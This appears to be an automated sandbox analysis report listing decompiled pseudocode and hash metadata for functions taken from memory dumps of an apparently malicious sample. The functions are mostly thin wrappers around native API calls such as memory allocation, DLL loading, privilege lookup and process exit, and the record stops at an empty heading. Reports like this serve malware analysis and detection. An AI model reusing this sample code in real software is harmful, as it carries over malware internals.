Opcode Fuzzy Hash: e41d586cd8cc04f93a5ff7d6774edc7877e099e6405a918b1416ec8c463979c7
Instruction Fuzzy Hash: ACF0A4B6210208ABDB14DF89DC81EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10429A30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10429A30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E1042A1A0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x10429a3f
0x10429a47
0x10429a69
0x10429a6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,1042A344,?,00000000,?,00003000,00000040,00000000,00000000,10419E13), ref: 10429A69

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 50740aec542d810fac315f3ee4eabcc92550c9856a83d95c1d56fbccfbc66593
Instruction ID: a14937314c0594694c096dd6614512e591fc14711d5a5766e1637ae97dd654f5
Opcode Fuzzy Hash: 50740aec542d810fac315f3ee4eabcc92550c9856a83d95c1d56fbccfbc66593
Instruction Fuzzy Hash: 6FF015B6210208ABDB14DF89DC81EAB77ADEF8C654F118248BE0897241C630F820CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1042997A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1042997A(void* _a4) {
				intOrPtr _v0;
				long _t8;
				void* _t11;

				0x65f44aa6(0x54);
				_t5 = _v0;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x1041aa63
				E1042A1A0(_t11, _v0, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a4); // executed
				return _t8;
			}

0x1042997c
0x10429983
0x10429986
0x1042998f
0x10429997
0x104299a5
0x104299a9

APIs

NtClose.NTDLL(10424E60,?,?,10424E60,10419E13,FFFFFFFF), ref: 104299A5

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 66ffec42c4186067963b56cf9f890342ebf381dabd0cb85c30505e07b9094bb5
Instruction ID: c4655b3906dd0c8ef6ddb7fec24387c51acb1bb57ea8d1fdccd258e7bf468795
Opcode Fuzzy Hash: 66ffec42c4186067963b56cf9f890342ebf381dabd0cb85c30505e07b9094bb5
Instruction Fuzzy Hash: F3E0C2353002046FE710EFD4DC85FE73B58EF88724F044058BA486B282C530F5108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 10429980, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10429980(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x1041aa63
				E1042A1A0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x10429983
0x10429986
0x1042998f
0x10429997
0x104299a5
0x104299a9

APIs

NtClose.NTDLL(10424E60,?,?,10424E60,10419E13,FFFFFFFF), ref: 104299A5

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d6a59dcf52cdea1e15d472f1d82ba4c19a9da4ab96bc6602dda4cb58a2bf6a16
Instruction ID: 18592571c551479ff9d395342abc7ede82b55b5ee53c05e6476075ad026649ab
Opcode Fuzzy Hash: d6a59dcf52cdea1e15d472f1d82ba4c19a9da4ab96bc6602dda4cb58a2bf6a16
Instruction Fuzzy Hash: 42D01776200214ABE710EB98DC85EA77BACEF88660F554599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 03889780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388978A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4052344bb56ee9d67e0c37befd8201c0f3947d9d1e25805d9fb21f50027aaa8
Instruction ID: ca3e979773f55bfb8ec53b87ef3d03f2a53d457f7a2d90695c7458ed1cc41cf4
Opcode Fuzzy Hash: d4052344bb56ee9d67e0c37befd8201c0f3947d9d1e25805d9fb21f50027aaa8
Instruction Fuzzy Hash: 5590026921304402E580B199550860A000597D1246F95D456A1009668CCA558C6D6375

Uniqueness

Uniqueness Score: -1.00%

Function 038897A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038897AA

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acd1f6310e537c3373ed0c58a31431d2b13d0b5397d9f87209cf9dd090964121
Instruction ID: 5723f570b86a167cd493151e575b125e13cc2f81b1296a8cd947013a00a6eb83
Opcode Fuzzy Hash: acd1f6310e537c3373ed0c58a31431d2b13d0b5397d9f87209cf9dd090964121
Instruction Fuzzy Hash: A090026130104403E540B19955186064005E7E1345F55D052E1408664CDA558C5E6276

Uniqueness

Uniqueness Score: -1.00%

Function 03889710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388971A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6735b801bd203703bb33a88d1152e5162c026695e83e9cb99341cab8242413c
Instruction ID: faf445281860f88b05bf732617e08b6f852fc9c858ceb846ed8fdccf3aa1f4d9
Opcode Fuzzy Hash: c6735b801bd203703bb33a88d1152e5162c026695e83e9cb99341cab8242413c
Instruction Fuzzy Hash: 1690027120104802E500A5D95508646000597E0345F55D052A6018665EC7A58C997175

Uniqueness

Uniqueness Score: -1.00%

Function 038896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038896EA

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eba0308f6102bafe3e8107b3714550f0af61cb4608881d87883b05c5bfb2f95f
Instruction ID: 369eb2c47b7893f17409b2086decbb6162d84b911ea793cb8ee4ad06a5e7fc0d
Opcode Fuzzy Hash: eba0308f6102bafe3e8107b3714550f0af61cb4608881d87883b05c5bfb2f95f
Instruction Fuzzy Hash: 679002712010CC02E510A199850474A000597D0345F59C452A5418768D87D58C997175

Uniqueness

Uniqueness Score: -1.00%

Function 03889A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03889A0A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ffbe59843d0f33cc8849852a11fce2d9b597c280a46fa1cf3526a1a5073a69e
Instruction ID: 51849b187547efa619f2ea90f3c3c84c43cdd28eeecec8ee7084c043d409af6c
Opcode Fuzzy Hash: 6ffbe59843d0f33cc8849852a11fce2d9b597c280a46fa1cf3526a1a5073a69e
Instruction Fuzzy Hash: 6290027120144802E500A199491470B000597D0346F55C052A2158665D87658C5975B5

Uniqueness

Uniqueness Score: -1.00%

Function 03889A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03889A2A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0610761e163330aa282b6dcc446ec284064e4abfc5d5adfef5aa791a7e6dc4b0
Instruction ID: 1da9e63e8d06bf6a0cbd510677a175d54b21d7798ddbeb92c3985a356b280cbc
Opcode Fuzzy Hash: 0610761e163330aa282b6dcc446ec284064e4abfc5d5adfef5aa791a7e6dc4b0
Instruction Fuzzy Hash: CF900261601044425540B1A989449064005BBE1255755C162A198C660D86998C6D66B9

Uniqueness

Uniqueness Score: -1.00%

Function 03889A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03889A5A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49998062755707872a4483513ca0a059fd53d86ffd4c0dd18610aaa783c7bf36
Instruction ID: 1dd37f75e6bd2c1eb30320b3bcc3ad3aba5e23ee982d3dfd31decf1d5c762f69
Opcode Fuzzy Hash: 49998062755707872a4483513ca0a059fd53d86ffd4c0dd18610aaa783c7bf36
Instruction Fuzzy Hash: 3B90026121184442E600A5A94D14B07000597D0347F55C156A1148664CCA558C696575

Uniqueness

Uniqueness Score: -1.00%

Function 03889660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388966A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7519a2b8e3b31df9edfc0e480d6434a616eca00abd651efe5efa4c0a41641bf
Instruction ID: 3b750ab67041626454b6e1e530bfa816ca127dc20b809daf1d37205fc3fde28f
Opcode Fuzzy Hash: d7519a2b8e3b31df9edfc0e480d6434a616eca00abd651efe5efa4c0a41641bf
Instruction Fuzzy Hash: 8E90027120104C02E580B199450464A000597D1345F95C056A1019764DCB558E5D77F5

Uniqueness

Uniqueness Score: -1.00%

Function 038899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038899AA

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 988667cf5b0a0e6916f33d7ad5d7532be93bf5b9382380b7ec5b0cf061373e25
Instruction ID: 9d13af18df65522869d2856cce6739dafa0d241bcdca5b72ca2b0ea377fbff81
Opcode Fuzzy Hash: 988667cf5b0a0e6916f33d7ad5d7532be93bf5b9382380b7ec5b0cf061373e25
Instruction Fuzzy Hash: 729002A134104842E500A1994514B060005D7E1345F55C056E2058664D8759CC5A717A

Uniqueness

Uniqueness Score: -1.00%

Function 038895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038895DA

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc63674be69362494a2e7c3bcc05d1367b9aef1b94b376fae41cf7d9c06a1bed
Instruction ID: 03685fb5cb8d8478b452041fceff1c6d0a7c2c31a84f5ca54be7106c555a21d3
Opcode Fuzzy Hash: cc63674be69362494a2e7c3bcc05d1367b9aef1b94b376fae41cf7d9c06a1bed
Instruction Fuzzy Hash: 899002A1202044035505B1994514616400A97E0245B55C062E20086A0DC6658C997179

Uniqueness

Uniqueness Score: -1.00%

Function 03889910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388991A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9775f39e0f2555150b58cb35134140952788323091430f6bd4d1173fb0def9f5
Instruction ID: 1c5fc83a4e8e80b218a05eccea85d8e83490e237cb849a36daaae5f083eb00be
Opcode Fuzzy Hash: 9775f39e0f2555150b58cb35134140952788323091430f6bd4d1173fb0def9f5
Instruction Fuzzy Hash: EB9002B120104802E540B1994504746000597D0345F55C052A6058664E87998DDD76B9

Uniqueness

Uniqueness Score: -1.00%

Function 03889540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388954A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7687e075563d80b3747a4c11023b0a9b2bf10e3bd7a479278dd487108799523
Instruction ID: f50f357c716719dcc94de2c7cb6665944af27cd1d907f682f9dc375cd8fe46ee
Opcode Fuzzy Hash: c7687e075563d80b3747a4c11023b0a9b2bf10e3bd7a479278dd487108799523
Instruction Fuzzy Hash: 89900265211044031505E5990704507004697D5395355C062F2009660CD7618C696175

Uniqueness

Uniqueness Score: -1.00%

Function 038898F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038898FA

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3bff9eee0ab2c4a89ebc11767e81bb2a942f3f73e1b207c9e793fae8c0d5aec0
Instruction ID: 1697e83e15d5abfbfbd7b16b49899819289e0bdcffe09139c131153bcddc6281
Opcode Fuzzy Hash: 3bff9eee0ab2c4a89ebc11767e81bb2a942f3f73e1b207c9e793fae8c0d5aec0
Instruction Fuzzy Hash: FE90026160104902E501B1994504616000A97D0285F95C063A2018665ECB658D9AB175

Uniqueness

Uniqueness Score: -1.00%

Function 03889840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388984A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7337b9d3566ee6a327364f3940e1432787a8df0821b6835cb5cd20ae9cbeac5e
Instruction ID: 5babd245e051b6185e6cd343181ffc73f78253c1ec306ae5378629c129770dca
Opcode Fuzzy Hash: 7337b9d3566ee6a327364f3940e1432787a8df0821b6835cb5cd20ae9cbeac5e
Instruction Fuzzy Hash: 18900261242085526945F19945045074006A7E0285795C053A2408A60C86669C5EE675

Uniqueness

Uniqueness Score: -1.00%

Function 03889860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0388986A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 38455999c34c3c5df6aed9f5a1dddc2b8e289a3d8db00a5b253356e2c352c4dc
Instruction ID: 33b30df2fa4cccab39bad89cfe3d22e4bb93af7145b8255227bcda13ac112e74
Opcode Fuzzy Hash: 38455999c34c3c5df6aed9f5a1dddc2b8e289a3d8db00a5b253356e2c352c4dc
Instruction Fuzzy Hash: ED90027120104813E511A1994604707000997D0285F95C453A1418668D97968D5AB175

Uniqueness

Uniqueness Score: -1.00%

Function 104182B0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E104182B0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E1042B070( &_v67, 0, 0x3f);
				E1042BC10( &_v68, 3);
				_t12 = E1041AE10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E10424F60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E1041A5A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x104182b0
0x104182bf
0x104182c3
0x104182ce
0x104182de
0x104182ee
0x104182f3
0x104182fa
0x104182fd
0x1041830a
0x1041830c
0x1041830e
0x1041832b
0x1041832b
0x00000000
0x1041832d
0x10418332

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 1041830A

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: da71dce8ab73f14e4c9e8fcbc8b309cac94c497a0c385d1bc6cdee84ed43d94a
Instruction ID: 85099378fb5eaafce0a487d58ea7f4819eb925042a88c0c0ba2febd0d6c45197
Opcode Fuzzy Hash: da71dce8ab73f14e4c9e8fcbc8b309cac94c497a0c385d1bc6cdee84ed43d94a
Instruction Fuzzy Hash: 2E01DF31A8022C7AE7209694AC83FAE776CDB40F54F45011CFF04BA2C1EAA8790646F6

Uniqueness

Uniqueness Score: -1.00%

Function 1041AE10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1041AE10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E1042BE60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E1042C280(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E1042C500( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E1042A6B0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x1041ae2c
0x1041ae2f
0x1041ae34
0x1041ae39
0x1041ae43
0x1041ae48
0x1041ae4b
0x1041ae4d
0x1041ae55
0x1041ae5a
0x1041ae5a
0x1041ae61
0x1041ae69
0x1041ae6c
0x1041ae6e
0x1041ae82
0x00000000
0x1041ae84
0x1041ae8a
0x1041ae3e
0x1041ae3e
0x1041ae3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 1041AE82

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8f90d9009738eb04470c7b551506a245642ae7c8f47aee6e4f8e1c18cbe2af74
Instruction ID: 641533f1f4ed681139c7c5366020b4cea07c5d43b3539317032bd864a06d0d0c
Opcode Fuzzy Hash: 8f90d9009738eb04470c7b551506a245642ae7c8f47aee6e4f8e1c18cbe2af74
Instruction Fuzzy Hash: 2C011EB9E4020DABDB00DAE4EC82FDDB7B8DB54208F004199E9089B241F635FB58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10429AE6, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(10424646,?,10424DBF,10424DBF,?,10424646,?,?,?,?,?,00000000,10419E13,?), ref: 10429B4D

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c2b64bebfa1df779e4ecfc13737bea232c770b276921948f7850f124c07448dd
Instruction ID: 9e2ed38bf89780e0fc2a05b087d838dd7814e1bf4cc1f4830f299b479397804a
Opcode Fuzzy Hash: c2b64bebfa1df779e4ecfc13737bea232c770b276921948f7850f124c07448dd
Instruction Fuzzy Hash: 4AF081B5600204ABDB14DF54EC85EEB3768EF84350F118559FD4C57241C635FA11CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 10429B52, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10429B52(void* __ebx, void* __ecx, intOrPtr _a4, void* _a8, long _a12, void* _a16, intOrPtr _a687749549) {
				intOrPtr _v117;
				char _t14;
				void* _t22;

				es = _a687749549;
				asm("arpl di, bx");
				ss = _v117;
				_t11 = _a4;
				_t7 = _t11 + 0xc74; // 0xc74
				E1042A1A0(_t22, _a4, _t7,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}

0x10429b55
0x10429b5d
0x10429b5f
0x10429b63
0x10429b6f
0x10429b77
0x10429b8d
0x10429b91

APIs

RtlFreeHeap.NTDLL(00000060,10419E13,?,?,10419E13,00000060,00000000,00000000,?,?,10419E13,?,00000000), ref: 10429B8D

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2f2eeab7080204c96e3c706787f0e7ef987f6269c4f19fcbee5dfd80d7a080e4
Instruction ID: 3116260c1207f9620b242248a0ac883560cb151992453a75fd1d290905e625e5
Opcode Fuzzy Hash: 2f2eeab7080204c96e3c706787f0e7ef987f6269c4f19fcbee5dfd80d7a080e4
Instruction Fuzzy Hash: 3BF0A971200204ABDB18DF68DC88EEB3768EF88390F014658FE4C97242D632A810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10429B60, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10429B60(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E1042A1A0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x10429b6f
0x10429b77
0x10429b8d
0x10429b91

APIs

RtlFreeHeap.NTDLL(00000060,10419E13,?,?,10419E13,00000060,00000000,00000000,?,?,10419E13,?,00000000), ref: 10429B8D

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 722403d1f52b6ac6af4ad51c1b89aa33e2ebcf6a2fa00a6b47d3cc84cc244731
Instruction ID: b090d99cac5ea545139f37ab5a07dd98a1a7014f8e4aaeeb356bb0fc0f744429
Opcode Fuzzy Hash: 722403d1f52b6ac6af4ad51c1b89aa33e2ebcf6a2fa00a6b47d3cc84cc244731
Instruction Fuzzy Hash: 23E04FB52102046BD714DF59DC45EA777ACEF88750F014558FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 10429B20, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(10424646,?,10424DBF,10424DBF,?,10424646,?,?,?,?,?,00000000,10419E13,?), ref: 10429B4D

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 42ee4c4a2325045a3490280fa94ec262edc2112f93c62f5c7d34f494aa27dc8f
Instruction ID: 819756dfa8f4eb57ee9345abdabee7afc585998207b4af64fdcdeb59e7ad7014
Opcode Fuzzy Hash: 42ee4c4a2325045a3490280fa94ec262edc2112f93c62f5c7d34f494aa27dc8f
Instruction Fuzzy Hash: 06E046B5210208ABDB14DF99DC81EA777ACEF88664F118558FE085B242C630F920CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 10429CC0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10429CC0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E1042A1A0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x10429cda
0x10429cf0
0x10429cf4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,1041F2E2,1041F2E2,0000003C,00000000,?,10419E85), ref: 10429CF0

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 07e55ad52437363d33c73a5bc1149f2f24c360891c704b2abcf78c2193fcf9b8
Instruction ID: fe427ee8cd4f92336f41aa0e6923c9767a7d820c41f8725c0bf8d8e357cc1855
Opcode Fuzzy Hash: 07e55ad52437363d33c73a5bc1149f2f24c360891c704b2abcf78c2193fcf9b8
Instruction Fuzzy Hash: 6BE01AB52002086BDB10DF49DC85EE737ADEF88650F018154BE0857241C934F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 10429B92, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E10429B92(intOrPtr _a4, int _a8) {
				void* _t15;

				asm("ficom dword [ecx+0x55de5df5]");
				_t8 = _a4;
				E1042A1A0(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x10429b9b
0x10429ba3
0x10429bba
0x10429bc8

APIs

